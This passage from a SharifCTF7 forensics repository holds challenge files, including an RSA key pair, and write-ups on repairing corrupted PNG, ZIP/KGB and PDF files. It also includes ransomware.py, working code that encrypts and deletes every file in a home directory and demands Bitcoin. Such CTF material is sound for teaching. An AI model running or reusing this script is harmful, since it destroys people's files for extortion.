25 | 3C4AD942NWv5VkU6FN2ifpQohGx2BIQdZaAyOmKtCKdPeOkaBOxj/UqNJPL2LNhj
26 | hCaxn6YUoNYu+TibpMkSq5sh8V344iT98/fYtn19m2A/SWuOr+g4s4XjS8lvgpuy
27 | V/7K0FTMfBHiKsggO+Yw/NrQKEYh9GOBSiRThgVHkV0oYnEViNvfcQf6UKvcTb/C
28 | OAHpcjhVMyzL2d8RagGxElO7U3F6FQqfh/2zb93uyYz18SEpUdeZGUl8m902n1XH
29 | ts5NrFZiqED04QKCAQEA8PlTw3GcKEUeHSu7lkiv1QZDIHKbJMog3OBYqGY6S6r1
30 | QlzaTlUc6FN1W/8Kr9tuNDsyxtDAFjy7RksuvWnNQo1v0ONpwDio2L318XCUjowt
31 | mC3/usg/I6eW8O6KSVNRmZNvnUtv9yWXLwyyOBDI7RSdBscTNkp0mLq+U5m1vp5F
32 | CBYubHUJavm/A3f1AzJYKNIphFisF96D9mxJWJXj1CCYew1ZFebIECWTmkN+spOM
33 | HSCCu1F3/px/a+XpLKbToxPmJjXuNnxB/Sk1dAL+RkOOFZ+XCwNxVDNxelZn+FBd
34 | KnWibBKvvnOazn+eFkWSLv9p0xnqx8jOxQlGwpptzwKCAQEArlU0ArFhH5Y0VHmN
35 | cWczXxgmJnOgJ9f/KXF3oztKYhPfAXi7MlpL6BvyCEmVZBFJXFStwaEWOUE1uItQ
36 | OjgVxGqZAFXABOT4MkcpEGVQZTPJoOfw5kUQoC6CoHz9/+RWMrVp1oQfCweicPCT
37 | vSOKPf9Jg0GR+914whJqxhDCsBG5zEueXBZqKpdqZTCtt4UIfd3jJKrx6y6HytPV
38 | eF3C2w/MmLIFPXdT01FH24BNh77qw45rmeiYfnrnia3ckBxptZHoKQtO8S+xXXMO
39 | 4U5gXa1Xd99y63Fsg/29gZKR4yjw3n9VXqR0lT2MHtyFwm5lyAqPaG0g929Pp8WB
40 | ZMJg4QKCAQADZM+MMh5r5sVMzd/fdvia/HKXk2Wh+ALMeZBmFsJ9bFP18k7UyZgV
41 | oY9Gk2n4HhQIQkktyaTa61IL5GUtH79XT5yiiYFkxqeCHfLHyrkc5NaDjSpL3CQf
42 | gW27yPBDphvBGPV6dqSGC458iCY+aeYaiK7JeKZJnnTT7dVeYgzQOXRpb76JooBW
43 | dFv/VYIq4Fujf4o8Je+OioC7SL0jtUC3LRpYqVB24YAx0gWpJ4gyRae0hU+yCayx
44 | 9kxJHbzR9yuF4XLdWOcY91kKkrkBAEXKgYsPvOaorgy7jdnsSik+swsM3QlDkmPN
45 | P92PSPbWA3bSmKBJ69SFqctXtRC9DuW7AoIBAE8HerFdVQJ0w7hESvHXhMuBw25X
46 | M+RJJAo2zsFFhYw3pB9i8OK1pe2igaYbmj6zx8Fj7IGZC9RcXOZ+PI2VAEE51XDT
47 | lAmCqGT1QDZmlWVqkMFPFEfcxzXzKGpqo/rbuM3fAynMqPTVc0Jf7r8KTixy352j
48 | LGKcFCYOfrKEGWBUhFcgeXiCeSiERo9xqi/9zG4ScOk3WKuBHoDi3LWB7uy/1O4e
49 | 828Y5oWsaNJWrVzKr1ZD6USYT+zO3qejT0pdI/QSKOhwiBdoybBkfbR6IyZLlIbB
50 | HzJ8pK7jgLUGfemjzKRnv/EsHkQ+geGGhK7P34EIKguE3PTa/4e17F8Zuw0=
51 | -----END RSA PRIVATE KEY-----


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/Locky/publickey.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN PUBLIC KEY-----
 2 | MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA3Yohu05z1NgjHl9e0Z/k
 3 | iEvQzdl8EH+nR47UXFnOQVakQbPx85As0YwtJZwYDkRABgwpWOpIz07jUDF2Wjxe
 4 | NtR84vNL4zT1ylpgNn52+vAwHMz90CeoGqP9pkTK06w9+HH145D5CEkBGwvpnHmr
 5 | nTvIaVigb90tXWQg4ag3+RmPSMHyxD7ExCogPXIXw/+w0IZ5MXZwRu91EHqYmpt9
 6 | MnRHsKuJjlOnF9Y5Gn23A9YyTzrrn5QEbRvHNCh5ZsPD90csiinwN4pMPgkjyrh5
 7 | jRAdBsqRBS6lemxuupw+j8lbPGqgj+4o/627c08nWei8HwhygCBwV+i4iUrm3dQX
 8 | 4L77CSLwhAwY2aPEDtuLNEtbKG71lbvgvBmJzu+O1TEUTi5Be3jxLb6GPibyFeUz
 9 | Qazm83A+1GVHGkkCpNzg2sRqv+DN/k3WiHRbc0sH7fnCvQcOQkziZh6RDmLokboR
10 | YwBRRMhbpIFewZeakQInwlTgDFpGnP51Jl1hAoHDLuPbHwIwQzzKf4chabr55kac
11 | gwY6nIcYvPWAD5WIsQox5sTnD6i44MQH5GfJ1wnHFhBYRVNlEVAD04QGWl0TNQ9C
12 | dW5avi/MDF61Ip5piZyx99C5Rzg4He1Bf7xe0AgvP4nARE54KjU7EF3GpazCNINh
13 | 0+bHFOmdhwe7s4AqlYYjzu8CAwEAAQ==
14 | -----END PUBLIC KEY-----


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/Locky/ransomware.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf-8 -*-
 3 | # I was so locky :)
 4 | 
 5 | import glob
 6 | from os.path import expanduser, isfile
 7 | from os import remove
 8 | from Crypto.PublicKey import RSA
 9 | import time
10 | 
11 | nbit = 4096
12 | privkey = RSA.generate(nbit, e = 65537)
13 | privkey_PEM = privkey.exportKey()
14 | pubkey  = privkey.publickey()
15 | stamp = int(time.time())
16 | 
17 | 
18 | home = expanduser("~")
19 | files = glob.glob(home + '/*')
20 | LC, i = [], 0
21 | for f in files:
22 |     if isfile(f):
23 |         if not f.endswith('.locky'):
24 |             fd = open(f, 'r')
25 |             g = open(f + '.locky', 'w')
26 |             round = stamp % 14
27 |             msg = fd.read()
28 |             for _ in xrange(round):
29 |                 msg = privkey.encrypt(msg, 0)[0]
30 |             LC.append(msg)
31 |             g.write(LC[i])
32 |             g.close()
33 |             fd.close()
34 |             remove(f)
35 |             i += 1   
36 | 
37 | pub = open(home + '/.locky_' + str(stamp), 'w')
38 | pub.write(pubkey.exportKey())
39 | pub.close()
40 | 
41 | troll = '''*                                                                           *
42 | *                        ▒▒▒▄▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄▄                         *
43 | *                        ▒▒█▒░░░░▄▄▄▄▀░░░░░▒▀▀▄▄▄▒▒█                        *
44 | *                        ▒█▒░░░░░▄▀▀▄▄░░░░▒▄▄▄▒▒▒▒▒▒█                       *
45 | *                        █▒▀▄▄▒░░██▄▄▄█░░▒██▄▄█▒▒▒▒▒▒█                      *
46 | *                        █▒▒░▄▀▄▄▄▀░░░░░░▒▒█▒▒▒▒▒▒▒▒█                       *
47 | *                        █▒░░█▄▄░░░░░█▀░░░░▀▄▒▒▄▀▀▀▄█                       *
48 | *                        █▒░░▀█▄█▀▀▄░▀▀▀▀▄▄▄▀▒▒▒█▒▒█                        *
49 | *                        ▒█▒░░░▀█▄▄█▀▀▀█▀▀▀█▀█▀██▒▒█                        *
50 | *                        ▒▒█▒░░░░▀██▄▄▄█▄▄▄█▄██▒▒▒▒█▄                       *
51 | *                        ▒▒▒█▒░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒█                       *
52 | *                        ▒▒▒▒▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀                       *
53 | *                                                                           *'''
54 | 
55 | print '*' * 77
56 | print '*' * 34 + ' WARNING ' + '*' * 34
57 | print '*' * 77
58 | print troll
59 | print '*' * 77
60 | print '*' * 14 + ' ALL OF YOUR FILES ENCRYPTED BY LOCKY RANSOMWARE ' + '*' * 14
61 | print '*' * 14 + ' My wallet is 1Locky2M3foYCzARBjfu93q6CrDYxpKvQS ' + '*' * 14
62 | raw_input('*' * 14 + ' Press enter to continue and pay 1 BTC to me ... ' + '*' * 14)
63 | 
64 | v = open('privkey.pem', 'w')
65 | v.write(privkey_PEM)
66 | v.close()


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/pretty_raw/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/pretty_raw/flag.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/pretty_raw/picture.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/pretty_raw/picture.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/pretty_raw/readme.md:
--------------------------------------------------------------------------------
 1 | ## Pretty Raw
 2 | 
 3 | We were given an unknown file; it contains a lot of zero bytes and some other; checking the end of file shows `IEND` and it suggests this file contents `PNG`, so I extracted it:
 4 | 
 5 | 
 6 | ![picture.png](picture.png)
 7 | 
 8 | As the picture suggests, it seems there's another `PNG` file called `flag.png` and its size is ~ 8 Kb, so I thought the unknown bytes should be uncompressed `IDAT` chunk; I compressed them and replaced `IDAT` chunk with the original picture and fixed image size as `picture.png` implied , without correct CRC and the result was the following picture:
 9 | 
10 | ![flag.png](flag.png)
11 | 
12 | We've got another flag!


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/pretty_slim/README.md:
--------------------------------------------------------------------------------
 1 | ## Pretty Slim
 2 | 
 3 | Opening the file in Winhex/Notepad, it seems like a Zip file.
 4 | We changed the first byte to `P` (PK header) and extracted it but it seemed to be corrupted!!  More changes are needed to fix it.
 5 | We had no time to fix it manually and we wanted the bonus points badly.
 6 | The `DiskInternals ZIP Repair` did it right and by extracting it we got another file with string `KGB in Kremlin28` in header
 7 | 
 8 | KGB archiver?
 9 | We should fix the header again
10 | 
11 | ```
12 | $ unzip slim_fix.zip 
13 | Archive:  slim_fix.zip
14 | This Zip file has been recovered!
15 |  extracting: flaggggg    
16 | 
17 | $ stat /tmp/1 | grep Size
18 |   Size: 8626         Blocks: 8          IO Block: 4096   regular file
19 |   
20 | $ kgb 1.kgb /tmp/1
21 | /tmp/1                           0KB -> 0KB
22 | 0KB -> 0KB w 0.01s. (112.53% czas: 29 KB/s)
23 | 
24 | $ hexdump -C 1.kgb| head -2
25 | 00000000  4b 47 42 5f 61 72 63 68  20 2d 33 0d 0a 38 36 32  |KGB_arch -3..862|
26 | 00000010  36 09 2f 74 6d 70 2f 31  0d 0a 1a 0c 00 82 4a c5  |6./tmp/1......J.|
27 | 
28 | $ stat flaggggg | grep Size
29 |   Size: 359         Blocks: 8          IO Block: 4096   regular file
30 |   
31 | $ hexdump -C flaggggg| head -2
32 | 00000000  4b 47 42 20 69 6e 20 4b  72 65 6d 6c 69 6e 32 38  |KGB in Kremlin28|
33 | 00000010  09 66 6c 61 67 67 67 67  67 0d 0a 1a 0c 00 7b 00  |.flaggggg.....{.|
34 | ```
35 | 
36 | KGB is not sensitive to the size of file in its header (inner file size before decompression)
37 | We set it to 359 and it worked so no need to bruteforce it
38 | 
39 | ```
40 | $ vbindiff flaggggg flaggggg_fixed_kgb 
41 | flaggggg                                                                        
42 | 0000 0000: 4B 47 42 20 69 6E 20 4B  72 65 6D 6C 69 6E 32 38  KGB in K remlin28
43 | [...]
44 | flaggggg_fixed_kgb                                                              
45 | 0000 0000: 4B 47 42 5F 61 72 63 68  20 2D 33 0D 0A 33 35 39  KGB_arch  -3..359
46 | [...]
47 | 
48 | $ file flaggggg_fixed_kgb 
49 | flaggggg_fixed_kgb: KGB Archiver file with compression level 3
50 | 
51 | $ kgb flaggggg_fixed_kgb 
52 | Extracting archive KGB_arch -3 flaggggg_fixed_kgb ...
53 |          0KB flaggggg: different: offset 0, archive=137 file=75
54 | 0KB -> 0KB w 0.01s. (100.00% czas: 44 KB/s)
55 | 
56 | $ rm flaggggg; kgb flaggggg_fixed_kgb
57 | Extracting archive KGB_arch -3 flaggggg_fixed_kgb ...
58 |          0KB flaggggg: extracted
59 | 0KB -> 0KB w 0.01s. (100.00% czas: 37 KB/s)
60 | 
61 | $ file flaggggg
62 | flaggggg: PNG image data, 111 x 111, 1-bit grayscale, non-interlaced
63 | ```
64 | 
65 | ![flaggggg.png](flaggggg.png)


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/pretty_slim/flaggggg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/pretty_slim/flaggggg.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/pretty_slim/flaggggg_fixed_kgb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/pretty_slim/flaggggg_fixed_kgb


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/pretty_slim/slim fix.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/pretty_slim/slim fix.zip


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/strange_pdf/readme.md:
--------------------------------------------------------------------------------
 1 | ## Strange PDF
 2 | 
 3 | We were given a PDF file containing some rotated `SharifCTF` string in the middle of page; Opening the file in a text editor shows there's 34 additional objects that were never referenced in the `PDF` file; I changed line 27 to `/Contents 7 0 R` and the secret revealed, so I wrote a script to generate the sequence of missing objects; Here's an example:
 4 | 
 5 | 
 6 | ```
 7 | 101 0 obj
 8 | <<
 9 | /Type /Page
10 | /Parent 2 0 R
11 | /Resources <<
12 |     /XObject  <<
13 |         /A 6 0 R
14 |     >>
15 | >>
16 | /Contents 7 0 R
17 | >>
18 | endobj
19 | ```
20 | 
21 | It fetches the content of object `7` so we need 34 more objects to get all parts, also we need to increase `/Count` to `34` and add additional objects to `/Kids` in object number `2`:
22 | 
23 | 
24 | ```
25 | 2 0 obj
26 | <<
27 |   /Type /Pages
28 |   /MediaBox [ 0 0 500 800 ]
29 |   /Count 34
30 |   /Kids [ 101 0 R 102 0 R 103 0 R 104 0 R 105 0 R 106 0 R 107 0 R 108 0 R 109 0 R 110 0 R 111 0 R 112 0 R 113 0 R 114 0 R 115 0 R 116 0 R 117 0 R 118 0 R 119 0 R 120 0 R 121 0 R 122 0 R 123 0 R 124 0 R 125 0 R 126 0 R 127 0 R 128 0 R 129 0 R 130 0 R 131 0 R 132 0 R 133 0 R  134 0 R
31 |  ]
32 | >>
33 | endobj
34 | ```
35 | 
36 | After fixing the missing parts, we have a series of decimal codes; Converted them and got another flag:
37 | 
38 | 
39 | ```
40 | 123 100 49 50 52 50 100 50 100 48 57 54 57 54 51 55 52 49 100 100 101 55 101 100 55 57 99 51 99 52 48 57 99 52 54 125
41 | ```
42 | 
43 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/strange_pdf/snapshot-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/strange_pdf/snapshot-1.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/strange_pdf/strange_pdf_fixed.pdf:
--------------------------------------------------------------------------------
   1 | %PDF-1.7
   2 | 1 0 obj 
   3 | <<
   4 |   /Type /Catalog
   5 |   /Pages 2 0 R
   6 | >>
   7 | endobj
   8 | 
   9 | 2 0 obj
  10 | <<
  11 |   /Type /Pages
  12 |   /MediaBox [ 0 0 500 800 ]
  13 |   /Count 34
  14 |   /Kids [ 101 0 R 102 0 R 103 0 R 104 0 R 105 0 R 106 0 R 107 0 R 108 0 R 109 0 R 110 0 R 111 0 R 112 0 R 113 0 R 114 0 R 115 0 R 116 0 R 117 0 R 118 0 R 119 0 R 120 0 R 121 0 R 122 0 R 123 0 R 124 0 R 125 0 R 126 0 R 127 0 R 128 0 R 129 0 R 130 0 R 131 0 R 132 0 R 133 0 R  134 0 R
  15 |  ]
  16 | >>
  17 | endobj
  18 | 101 0 obj
  19 | <<
  20 | /Type /Page
  21 | /Parent 2 0 R
  22 | /Resources <<
  23 |     /XObject  <<
  24 |         /A 6 0 R
  25 |     >>
  26 | >>
  27 | /Contents 7 0 R
  28 | >>
  29 | endobj
  30 | 102 0 obj
  31 | <<
  32 | /Type /Page
  33 | /Parent 2 0 R
  34 | /Resources <<
  35 |     /XObject  <<
  36 |         /A 6 0 R
  37 |     >>
  38 | >>
  39 | /Contents 8 0 R
  40 | >>
  41 | endobj
  42 | 103 0 obj
  43 | <<
  44 | /Type /Page
  45 | /Parent 2 0 R
  46 | /Resources <<
  47 |     /XObject  <<
  48 |         /A 6 0 R
  49 |     >>
  50 | >>
  51 | /Contents 9 0 R
  52 | >>
  53 | endobj
  54 | 104 0 obj
  55 | <<
  56 | /Type /Page
  57 | /Parent 2 0 R
  58 | /Resources <<
  59 |     /XObject  <<
  60 |         /A 6 0 R
  61 |     >>
  62 | >>
  63 | /Contents 10 0 R
  64 | >>
  65 | endobj
  66 | 105 0 obj
  67 | <<
  68 | /Type /Page
  69 | /Parent 2 0 R
  70 | /Resources <<
  71 |     /XObject  <<
  72 |         /A 6 0 R
  73 |     >>
  74 | >>
  75 | /Contents 11 0 R
  76 | >>
  77 | endobj
  78 | 106 0 obj
  79 | <<
  80 | /Type /Page
  81 | /Parent 2 0 R
  82 | /Resources <<
  83 |     /XObject  <<
  84 |         /A 6 0 R
  85 |     >>
  86 | >>
  87 | /Contents 12 0 R
  88 | >>
  89 | endobj
  90 | 107 0 obj
  91 | <<
  92 | /Type /Page
  93 | /Parent 2 0 R
  94 | /Resources <<
  95 |     /XObject  <<
  96 |         /A 6 0 R
  97 |     >>
  98 | >>
  99 | /Contents 13 0 R
 100 | >>
 101 | endobj
 102 | 108 0 obj
 103 | <<
 104 | /Type /Page
 105 | /Parent 2 0 R
 106 | /Resources <<
 107 |     /XObject  <<
 108 |         /A 6 0 R
 109 |     >>
 110 | >>
 111 | /Contents 14 0 R
 112 | >>
 113 | endobj
 114 | 109 0 obj
 115 | <<
 116 | /Type /Page
 117 | /Parent 2 0 R
 118 | /Resources <<
 119 |     /XObject  <<
 120 |         /A 6 0 R
 121 |     >>
 122 | >>
 123 | /Contents 15 0 R
 124 | >>
 125 | endobj
 126 | 110 0 obj
 127 | <<
 128 | /Type /Page
 129 | /Parent 2 0 R
 130 | /Resources <<
 131 |     /XObject  <<
 132 |         /A 6 0 R
 133 |     >>
 134 | >>
 135 | /Contents 16 0 R
 136 | >>
 137 | endobj
 138 | 111 0 obj
 139 | <<
 140 | /Type /Page
 141 | /Parent 2 0 R
 142 | /Resources <<
 143 |     /XObject  <<
 144 |         /A 6 0 R
 145 |     >>
 146 | >>
 147 | /Contents 17 0 R
 148 | >>
 149 | endobj
 150 | 112 0 obj
 151 | <<
 152 | /Type /Page
 153 | /Parent 2 0 R
 154 | /Resources <<
 155 |     /XObject  <<
 156 |         /A 6 0 R
 157 |     >>
 158 | >>
 159 | /Contents 18 0 R
 160 | >>
 161 | endobj
 162 | 113 0 obj
 163 | <<
 164 | /Type /Page
 165 | /Parent 2 0 R
 166 | /Resources <<
 167 |     /XObject  <<
 168 |         /A 6 0 R
 169 |     >>
 170 | >>
 171 | /Contents 19 0 R
 172 | >>
 173 | endobj
 174 | 114 0 obj
 175 | <<
 176 | /Type /Page
 177 | /Parent 2 0 R
 178 | /Resources <<
 179 |     /XObject  <<
 180 |         /A 6 0 R
 181 |     >>
 182 | >>
 183 | /Contents 20 0 R
 184 | >>
 185 | endobj
 186 | 115 0 obj
 187 | <<
 188 | /Type /Page
 189 | /Parent 2 0 R
 190 | /Resources <<
 191 |     /XObject  <<
 192 |         /A 6 0 R
 193 |     >>
 194 | >>
 195 | /Contents 21 0 R
 196 | >>
 197 | endobj
 198 | 116 0 obj
 199 | <<
 200 | /Type /Page
 201 | /Parent 2 0 R
 202 | /Resources <<
 203 |     /XObject  <<
 204 |         /A 6 0 R
 205 |     >>
 206 | >>
 207 | /Contents 22 0 R
 208 | >>
 209 | endobj
 210 | 117 0 obj
 211 | <<
 212 | /Type /Page
 213 | /Parent 2 0 R
 214 | /Resources <<
 215 |     /XObject  <<
 216 |         /A 6 0 R
 217 |     >>
 218 | >>
 219 | /Contents 23 0 R
 220 | >>
 221 | endobj
 222 | 118 0 obj
 223 | <<
 224 | /Type /Page
 225 | /Parent 2 0 R
 226 | /Resources <<
 227 |     /XObject  <<
 228 |         /A 6 0 R
 229 |     >>
 230 | >>
 231 | /Contents 24 0 R
 232 | >>
 233 | endobj
 234 | 119 0 obj
 235 | <<
 236 | /Type /Page
 237 | /Parent 2 0 R
 238 | /Resources <<
 239 |     /XObject  <<
 240 |         /A 6 0 R
 241 |     >>
 242 | >>
 243 | /Contents 25 0 R
 244 | >>
 245 | endobj
 246 | 120 0 obj
 247 | <<
 248 | /Type /Page
 249 | /Parent 2 0 R
 250 | /Resources <<
 251 |     /XObject  <<
 252 |         /A 6 0 R
 253 |     >>
 254 | >>
 255 | /Contents 26 0 R
 256 | >>
 257 | endobj
 258 | 121 0 obj
 259 | <<
 260 | /Type /Page
 261 | /Parent 2 0 R
 262 | /Resources <<
 263 |     /XObject  <<
 264 |         /A 6 0 R
 265 |     >>
 266 | >>
 267 | /Contents 27 0 R
 268 | >>
 269 | endobj
 270 | 122 0 obj
 271 | <<
 272 | /Type /Page
 273 | /Parent 2 0 R
 274 | /Resources <<
 275 |     /XObject  <<
 276 |         /A 6 0 R
 277 |     >>
 278 | >>
 279 | /Contents 28 0 R
 280 | >>
 281 | endobj
 282 | 123 0 obj
 283 | <<
 284 | /Type /Page
 285 | /Parent 2 0 R
 286 | /Resources <<
 287 |     /XObject  <<
 288 |         /A 6 0 R
 289 |     >>
 290 | >>
 291 | /Contents 29 0 R
 292 | >>
 293 | endobj
 294 | 124 0 obj
 295 | <<
 296 | /Type /Page
 297 | /Parent 2 0 R
 298 | /Resources <<
 299 |     /XObject  <<
 300 |         /A 6 0 R
 301 |     >>
 302 | >>
 303 | /Contents 30 0 R
 304 | >>
 305 | endobj
 306 | 125 0 obj
 307 | <<
 308 | /Type /Page
 309 | /Parent 2 0 R
 310 | /Resources <<
 311 |     /XObject  <<
 312 |         /A 6 0 R
 313 |     >>
 314 | >>
 315 | /Contents 31 0 R
 316 | >>
 317 | endobj
 318 | 126 0 obj
 319 | <<
 320 | /Type /Page
 321 | /Parent 2 0 R
 322 | /Resources <<
 323 |     /XObject  <<
 324 |         /A 6 0 R
 325 |     >>
 326 | >>
 327 | /Contents 32 0 R
 328 | >>
 329 | endobj
 330 | 127 0 obj
 331 | <<
 332 | /Type /Page
 333 | /Parent 2 0 R
 334 | /Resources <<
 335 |     /XObject  <<
 336 |         /A 6 0 R
 337 |     >>
 338 | >>
 339 | /Contents 33 0 R
 340 | >>
 341 | endobj
 342 | 128 0 obj
 343 | <<
 344 | /Type /Page
 345 | /Parent 2 0 R
 346 | /Resources <<
 347 |     /XObject  <<
 348 |         /A 6 0 R
 349 |     >>
 350 | >>
 351 | /Contents 34 0 R
 352 | >>
 353 | endobj
 354 | 129 0 obj
 355 | <<
 356 | /Type /Page
 357 | /Parent 2 0 R
 358 | /Resources <<
 359 |     /XObject  <<
 360 |         /A 6 0 R
 361 |     >>
 362 | >>
 363 | /Contents 35 0 R
 364 | >>
 365 | endobj
 366 | 130 0 obj
 367 | <<
 368 | /Type /Page
 369 | /Parent 2 0 R
 370 | /Resources <<
 371 |     /XObject  <<
 372 |         /A 6 0 R
 373 |     >>
 374 | >>
 375 | /Contents 36 0 R
 376 | >>
 377 | endobj
 378 | 131 0 obj
 379 | <<
 380 | /Type /Page
 381 | /Parent 2 0 R
 382 | /Resources <<
 383 |     /XObject  <<
 384 |         /A 6 0 R
 385 |     >>
 386 | >>
 387 | /Contents 37 0 R
 388 | >>
 389 | endobj
 390 | 132 0 obj
 391 | <<
 392 | /Type /Page
 393 | /Parent 2 0 R
 394 | /Resources <<
 395 |     /XObject  <<
 396 |         /A 6 0 R
 397 |     >>
 398 | >>
 399 | /Contents 38 0 R
 400 | >>
 401 | endobj
 402 | 133 0 obj
 403 | <<
 404 | /Type /Page
 405 | /Parent 2 0 R
 406 | /Resources <<
 407 |     /XObject  <<
 408 |         /A 6 0 R
 409 |     >>
 410 | >>
 411 | /Contents 39 0 R
 412 | >>
 413 | endobj
 414 | 134 0 obj
 415 | <<
 416 | /Type /Page
 417 | /Parent 2 0 R
 418 | /Resources <<
 419 |     /XObject  <<
 420 |         /A 6 0 R
 421 |     >>
 422 | >>
 423 | /Contents 40 0 R
 424 | >>
 425 | endobj
 426 | 
 427 | 
 428 | 
 429 | 
 430 | %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 431 | 7 0 obj
 432 | <</Length 283>>
 433 | stream
 434 | 2 w 
 435 | 100 650 m 100 620 l 
 436 | 100 615 m 100 585 l 
 437 | 
 438 | 120 650 m 140 650 l 
 439 | 140 645 m 140 625 l 
 440 | 120 620 m 140 620 l 
 441 | 120 615 m 120 595 l 
 442 | 120 590 m 140 590 l 
 443 | 
 444 | 160 650 m 180 650 l 
 445 | 180 645 m 180 625 l 
 446 | 160 620 m 180 620 l 
 447 | 180 615 m 180 595 l 
 448 | 160 590 m 180 590 l 
 449 | S
 450 | endstream
 451 | endobj
 452 | 
 453 | 8 0 obj
 454 | <</Length 318>>
 455 | stream
 456 | 2 w 
 457 | 100 650 m 100 620 l 
 458 | 100 615 m 100 585 l 
 459 | 
 460 | 120 650 m 140 650 l 
 461 | 140 645 m 140 625 l
 462 | 120 645 m 120 625 l  
 463 | 120 615 m 120 595 l 
 464 | 120 590 m 140 590 l 
 465 | 140 615 m 140 595 l 
 466 | 
 467 | 160 650 m 180 650 l 
 468 | 180 645 m 180 625 l
 469 | 160 645 m 160 625 l  
 470 | 160 615 m 160 595 l 
 471 | 160 590 m 180 590 l 
 472 | 180 615 m 180 595 l 
 473 | S
 474 | endstream
 475 | endobj
 476 | 
 477 | 9 0 obj
 478 | <</Length 234>>
 479 | stream
 480 | 2 w 
 481 | 
 482 | 140 645 m 140 625 l
 483 | 120 645 m 120 625 l  
 484 | 120 620 m 140 620 l 
 485 | 140 615 m 140 595 l 
 486 | 
 487 | 160 650 m 180 650 l 
 488 | 180 645 m 180 625 l
 489 | 160 645 m 160 625 l  
 490 | 160 620 m 180 620 l 
 491 | 160 590 m 180 590 l 
 492 | 180 615 m 180 595 l 
 493 | S
 494 | endstream
 495 | endobj
 496 | 
 497 | 10 0 obj
 498 | <</Length 257>>
 499 | stream
 500 | 2 w  
 501 | 
 502 | 120 650 m 140 650 l 
 503 | 120 645 m 120 625 l 
 504 | 120 620 m 140 620 l  
 505 | 120 590 m 140 590 l 
 506 | 140 615 m 140 595 l 
 507 | 
 508 | 160 650 m 180 650 l 
 509 | 180 645 m 180 625 l
 510 | 160 645 m 160 625 l  
 511 | 160 615 m 160 595 l 
 512 | 160 590 m 180 590 l 
 513 | 180 615 m 180 595 l 
 514 | S
 515 | endstream
 516 | endobj
 517 | 
 518 | 11 0 obj
 519 | <</Length 236>>
 520 | stream
 521 | 2 w  
 522 | 
 523 | 120 650 m 140 650 l 
 524 | 120 645 m 120 625 l 
 525 | 120 620 m 140 620 l  
 526 | 120 590 m 140 590 l 
 527 | 140 615 m 140 595 l
 528 | 
 529 | 160 650 m 180 650 l 
 530 | 180 645 m 180 625 l 
 531 | 160 620 m 180 620 l 
 532 | 160 615 m 160 595 l 
 533 | 160 590 m 180 590 l 
 534 | 
 535 | S
 536 | endstream
 537 | endobj
 538 | 
 539 | 12 0 obj
 540 | <</Length 257>>
 541 | stream
 542 | 2 w  
 543 | 
 544 | 120 650 m 140 650 l 
 545 | 120 645 m 120 625 l 
 546 | 120 620 m 140 620 l  
 547 | 120 590 m 140 590 l 
 548 | 140 615 m 140 595 l 
 549 | 
 550 | 160 650 m 180 650 l 
 551 | 180 645 m 180 625 l
 552 | 160 645 m 160 625 l  
 553 | 160 615 m 160 595 l 
 554 | 160 590 m 180 590 l 
 555 | 180 615 m 180 595 l 
 556 | S
 557 | endstream
 558 | endobj
 559 | 
 560 | 13 0 obj
 561 | <</Length 318>>
 562 | stream
 563 | 2 w 
 564 | 100 650 m 100 620 l 
 565 | 100 615 m 100 585 l 
 566 | 
 567 | 120 650 m 140 650 l 
 568 | 140 645 m 140 625 l
 569 | 120 645 m 120 625 l  
 570 | 120 615 m 120 595 l 
 571 | 120 590 m 140 590 l 
 572 | 140 615 m 140 595 l 
 573 | 
 574 | 160 650 m 180 650 l 
 575 | 180 645 m 180 625 l
 576 | 160 645 m 160 625 l  
 577 | 160 615 m 160 595 l 
 578 | 160 590 m 180 590 l 
 579 | 180 615 m 180 595 l 
 580 | S
 581 | endstream
 582 | endobj
 583 | 
 584 | 14 0 obj
 585 | <</Length 257>>
 586 | stream
 587 | 2 w  
 588 | 
 589 | 120 650 m 140 650 l 
 590 | 120 645 m 120 625 l 
 591 | 120 620 m 140 620 l  
 592 | 120 590 m 140 590 l 
 593 | 140 615 m 140 595 l 
 594 | 
 595 | 160 650 m 180 650 l 
 596 | 180 645 m 180 625 l
 597 | 160 645 m 160 625 l  
 598 | 160 615 m 160 595 l 
 599 | 160 590 m 180 590 l 
 600 | 180 615 m 180 595 l 
 601 | S
 602 | endstream
 603 | endobj
 604 | 
 605 | 15 0 obj
 606 | <</Length 318>>
 607 | stream
 608 | 2 w 
 609 | 100 650 m 100 620 l 
 610 | 100 615 m 100 585 l 
 611 | 
 612 | 120 650 m 140 650 l 
